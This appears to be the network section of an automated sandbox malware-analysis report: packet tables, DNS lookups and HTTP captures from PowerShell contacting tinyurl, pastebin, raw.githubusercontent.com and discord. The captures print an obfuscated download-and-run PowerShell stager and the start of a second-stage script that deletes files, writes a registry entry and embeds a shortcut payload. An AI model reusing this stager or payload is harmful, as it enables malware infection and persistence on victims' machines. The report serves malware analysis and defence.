                                                                              Oct 15, 2024 15:54:02.957015991 CEST44349719185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.957043886 CEST44349719185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.957068920 CEST44349719185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.957076073 CEST49719443192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:54:02.957103014 CEST44349719185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.957118034 CEST49719443192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:54:02.957149982 CEST49719443192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:54:02.957158089 CEST44349719185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.964972019 CEST44349719185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.965028048 CEST49719443192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:54:03.025378942 CEST49719443192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:54:07.200309992 CEST49720443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:07.200362921 CEST44349720162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:07.200447083 CEST49720443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:07.200887918 CEST49720443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:07.200900078 CEST44349720162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:07.865339041 CEST44349720162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:07.865430117 CEST49720443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:07.867170095 CEST49720443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:07.867177010 CEST44349720162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:07.867577076 CEST44349720162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:07.868675947 CEST49720443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:07.911412954 CEST44349720162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:07.911545038 CEST49720443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:07.911556959 CEST44349720162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:08.179148912 CEST44349720162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:08.179272890 CEST44349720162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:08.179348946 CEST49720443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:08.185059071 CEST49720443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:13.267340899 CEST4971280192.168.2.10104.20.3.235
                                                                              Oct 15, 2024 15:54:15.471035004 CEST49722443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:15.471091032 CEST44349722162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:15.471405029 CEST49722443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:15.471645117 CEST49722443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:15.471661091 CEST44349722162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:16.071904898 CEST44349722162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:16.072045088 CEST49722443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:16.080545902 CEST49722443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:16.080562115 CEST44349722162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:16.080868959 CEST44349722162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:16.083808899 CEST49722443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:16.131397009 CEST44349722162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:16.131450891 CEST49722443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:16.131464005 CEST44349722162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:16.372903109 CEST44349722162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:16.373075962 CEST44349722162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:16.373126984 CEST49722443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:16.379225969 CEST49722443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:21.413132906 CEST4971680192.168.2.10172.67.19.24

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 15, 2024 15:53:24.555679083 CEST6213453192.168.2.101.1.1.1
                                                                              Oct 15, 2024 15:53:24.562563896 CEST53621341.1.1.1192.168.2.10
                                                                              Oct 15, 2024 15:53:25.318777084 CEST5067753192.168.2.101.1.1.1
                                                                              Oct 15, 2024 15:53:25.326030970 CEST53506771.1.1.1192.168.2.10
                                                                              Oct 15, 2024 15:53:26.346915007 CEST5176653192.168.2.101.1.1.1
                                                                              Oct 15, 2024 15:53:26.355330944 CEST53517661.1.1.1192.168.2.10
                                                                              Oct 15, 2024 15:53:51.238801003 CEST5865253192.168.2.101.1.1.1
                                                                              Oct 15, 2024 15:53:51.245807886 CEST53586521.1.1.1192.168.2.10
                                                                              Oct 15, 2024 15:53:59.701875925 CEST5703953192.168.2.101.1.1.1
                                                                              Oct 15, 2024 15:53:59.708549023 CEST53570391.1.1.1192.168.2.10

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Oct 15, 2024 15:53:24.555679083 CEST192.168.2.101.1.1.10xe434Standard query (0)tinyurl.comA (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:25.318777084 CEST192.168.2.101.1.1.10x9838Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:26.346915007 CEST192.168.2.101.1.1.10xd9edStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:51.238801003 CEST192.168.2.101.1.1.10xd705Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:59.701875925 CEST192.168.2.101.1.1.10x91d1Standard query (0)pastebin.comA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Oct 15, 2024 15:53:24.562563896 CEST1.1.1.1192.168.2.100xe434No error (0)tinyurl.com104.18.111.161A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:24.562563896 CEST1.1.1.1192.168.2.100xe434No error (0)tinyurl.com104.17.112.233A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:25.326030970 CEST1.1.1.1192.168.2.100x9838No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:25.326030970 CEST1.1.1.1192.168.2.100x9838No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:25.326030970 CEST1.1.1.1192.168.2.100x9838No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:26.355330944 CEST1.1.1.1192.168.2.100xd9edNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:26.355330944 CEST1.1.1.1192.168.2.100xd9edNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:26.355330944 CEST1.1.1.1192.168.2.100xd9edNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:26.355330944 CEST1.1.1.1192.168.2.100xd9edNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:51.245807886 CEST1.1.1.1192.168.2.100xd705No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:51.245807886 CEST1.1.1.1192.168.2.100xd705No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:51.245807886 CEST1.1.1.1192.168.2.100xd705No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:51.245807886 CEST1.1.1.1192.168.2.100xd705No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:51.245807886 CEST1.1.1.1192.168.2.100xd705No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:59.708549023 CEST1.1.1.1192.168.2.100x91d1No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:59.708549023 CEST1.1.1.1192.168.2.100x91d1No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:59.708549023 CEST1.1.1.1192.168.2.100x91d1No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • pastebin.com
                                                                              • raw.githubusercontent.com
                                                                              • discord.com
                                                                              • tinyurl.com

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.1049701104.18.111.161807756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 15, 2024 15:53:24.581403017 CEST164OUTGET /yeykydun HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: tinyurl.com
                                                                              Connection: Keep-Alive
                                                                              Oct 15, 2024 15:53:25.267205954 CEST1236INHTTP/1.1 301 Moved Permanently
                                                                              Date: Tue, 15 Oct 2024 13:53:25 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              Location: https://pastebin.com/raw/sA04Mwk2
                                                                              Referrer-Policy: unsafe-url
                                                                              X-Robots-Tag: noindex
                                                                              X-TinyURL-Redirect-Type: redirect
                                                                              Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private
                                                                              X-TinyURL-Redirect: eyJpdiI6IkI1L1JYKzBkc1dSbWFSRU9OcVg4eVE9PSIsInZhbHVlIjoiZU9EV0xyMnM0NVFXUEdrYXIxQ3VtYndVK2JJdk1oRDY2Z1F5UjBtbXRsS1hrTnhMcXRpb0NEN21lOU1zYUlVMm1zWTZyeGNiRGcxUUEyZ3pPd0REbFE9PSIsIm1hYyI6ImQxMDA2OTAwMTgzM2YwNTk3NWE0MDc1ZjkwOThmODY3NGUyOTEzMmI2YTQ0YWNlZmI3ZTZkYWY2YjQ1ODk2NzMiLCJ0YWciOiIifQ==
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              CF-Cache-Status: HIT
                                                                              Set-Cookie: __cf_bm=UPzyY0C7U9qNENE.77_kkH1Mp6PRUGsFgC5WAzylWOE-1729000405-1.0.1.1-blluZz9Mkqi.uzQnlfXYl.YUnHAFxH3Kfd9wSmXe_o3tgGgECGVR6jb1FBem9TajbPF3QwhE.KlvovNn2WB2pg; path=/; expires=Tue, 15-Oct-24 14:23:25 GMT; domain=.tinyurl.com; HttpOnly
                                                                              Server: cloudflare
                                                                              CF-RAY: 8d304b940c906900-DFW
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              Data Raw: 31 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 62 69 6e 2e 63 6f 6d 2f
                                                                              Data Ascii: 17a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://pastebin.com/
                                                                              Oct 15, 2024 15:53:25.267227888 CEST246INData Raw: 72 61 77 2f 73 41 30 34 4d 77 6b 32 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 62 69 6e 2e 63 6f 6d 2f 72 61 77 2f 73 41 30 34 4d 77 6b 32
                                                                              Data Ascii: raw/sA04Mwk2'" /> <title>Redirecting to https://pastebin.com/raw/sA04Mwk2</title> </head> <body> Redirecting to <a href="https://pastebin.com/raw/sA04Mwk2">https://pastebin.com/raw/sA04Mwk2</a>. </body></html>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.1049703185.199.111.133807756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 15, 2024 15:53:26.361634016 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: raw.githubusercontent.com
                                                                              Connection: Keep-Alive
                                                                              Oct 15, 2024 15:53:26.966737986 CEST541INHTTP/1.1 301 Moved Permanently
                                                                              Connection: close
                                                                              Content-Length: 0
                                                                              Server: Varnish
                                                                              Retry-After: 0
                                                                              Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                              Accept-Ranges: bytes
                                                                              Date: Tue, 15 Oct 2024 13:53:26 GMT
                                                                              Via: 1.1 varnish
                                                                              X-Served-By: cache-dfw-kdal2120044-DFW
                                                                              X-Cache: HIT
                                                                              X-Cache-Hits: 0
                                                                              X-Timer: S1729000407.901962,VS0,VE0
                                                                              Access-Control-Allow-Origin: *
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              Expires: Tue, 15 Oct 2024 13:58:26 GMT
                                                                              Vary: Authorization,Accept-Encoding


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.1049712104.20.3.235802040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 15, 2024 15:53:51.904943943 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: pastebin.com
                                                                              Connection: Keep-Alive
                                                                              Oct 15, 2024 15:53:52.548341036 CEST472INHTTP/1.1 301 Moved Permanently
                                                                              Date: Tue, 15 Oct 2024 13:53:52 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 167
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=3600
                                                                              Expires: Tue, 15 Oct 2024 14:53:52 GMT
                                                                              Location: https://pastebin.com/raw/sA04Mwk2
                                                                              Server: cloudflare
                                                                              CF-RAY: 8d304c3ecdc03ac7-DFW
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.1049714185.199.111.133802040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 15, 2024 15:53:53.384794950 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: raw.githubusercontent.com
                                                                              Connection: Keep-Alive
                                                                              Oct 15, 2024 15:53:53.986255884 CEST541INHTTP/1.1 301 Moved Permanently
                                                                              Connection: close
                                                                              Content-Length: 0
                                                                              Server: Varnish
                                                                              Retry-After: 0
                                                                              Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                              Accept-Ranges: bytes
                                                                              Date: Tue, 15 Oct 2024 13:53:53 GMT
                                                                              Via: 1.1 varnish
                                                                              X-Served-By: cache-dfw-kdfw8210074-DFW
                                                                              X-Cache: HIT
                                                                              X-Cache-Hits: 0
                                                                              X-Timer: S1729000434.920436,VS0,VE0
                                                                              Access-Control-Allow-Origin: *
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              Expires: Tue, 15 Oct 2024 13:58:53 GMT
                                                                              Vary: Authorization,Accept-Encoding


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.1049716172.67.19.24805024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 15, 2024 15:53:59.727513075 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: pastebin.com
                                                                              Connection: Keep-Alive
                                                                              Oct 15, 2024 15:54:00.333002090 CEST472INHTTP/1.1 301 Moved Permanently
                                                                              Date: Tue, 15 Oct 2024 13:54:00 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 167
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=3600
                                                                              Expires: Tue, 15 Oct 2024 14:54:00 GMT
                                                                              Location: https://pastebin.com/raw/sA04Mwk2
                                                                              Server: cloudflare
                                                                              CF-RAY: 8d304c6f9ca22c89-DFW
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.1049718185.199.111.133805024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 15, 2024 15:54:01.603790045 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: raw.githubusercontent.com
                                                                              Connection: Keep-Alive
                                                                              Oct 15, 2024 15:54:02.209845066 CEST541INHTTP/1.1 301 Moved Permanently
                                                                              Connection: close
                                                                              Content-Length: 0
                                                                              Server: Varnish
                                                                              Retry-After: 0
                                                                              Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                              Accept-Ranges: bytes
                                                                              Date: Tue, 15 Oct 2024 13:54:02 GMT
                                                                              Via: 1.1 varnish
                                                                              X-Served-By: cache-dfw-kdfw8210042-DFW
                                                                              X-Cache: HIT
                                                                              X-Cache-Hits: 0
                                                                              X-Timer: S1729000442.144902,VS0,VE0
                                                                              Access-Control-Allow-Origin: *
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              Expires: Tue, 15 Oct 2024 13:59:02 GMT
                                                                              Vary: Authorization,Accept-Encoding


                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.1049702104.20.3.2354437756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-15 13:53:26 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: pastebin.com
                                                                              Connection: Keep-Alive
                                                                              2024-10-15 13:53:26 UTC396INHTTP/1.1 200 OK
                                                                              Date: Tue, 15 Oct 2024 13:53:26 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              x-frame-options: DENY
                                                                              x-content-type-options: nosniff
                                                                              x-xss-protection: 1;mode=block
                                                                              cache-control: public, max-age=1801
                                                                              CF-Cache-Status: HIT
                                                                              Age: 56
                                                                              Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                              Server: cloudflare
                                                                              CF-RAY: 8d304b9add1f2ccc-DFW
                                                                              2024-10-15 13:53:26 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                              Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                              2024-10-15 13:53:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.1049704185.199.111.1334437756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-15 13:53:27 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: raw.githubusercontent.com
                                                                              Connection: Keep-Alive
                                                                              2024-10-15 13:53:27 UTC901INHTTP/1.1 200 OK
                                                                              Connection: close
                                                                              Content-Length: 7508
                                                                              Cache-Control: max-age=300
                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                              Strict-Transport-Security: max-age=31536000
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Frame-Options: deny
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                              Accept-Ranges: bytes
                                                                              Date: Tue, 15 Oct 2024 13:53:27 GMT
                                                                              Via: 1.1 varnish
                                                                              X-Served-By: cache-dfw-kdfw8210028-DFW
                                                                              X-Cache: HIT
                                                                              X-Cache-Hits: 1
                                                                              X-Timer: S1729000408.654210,VS0,VE1
                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                              Access-Control-Allow-Origin: *
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              X-Fastly-Request-ID: ad4ed0774367fab2607d71d24a1079e4b77d309a
                                                                              Expires: Tue, 15 Oct 2024 13:58:27 GMT
                                                                              Source-Age: 55
                                                                              2024-10-15 13:53:27 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                              Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                              2024-10-15 13:53:27 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                              Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
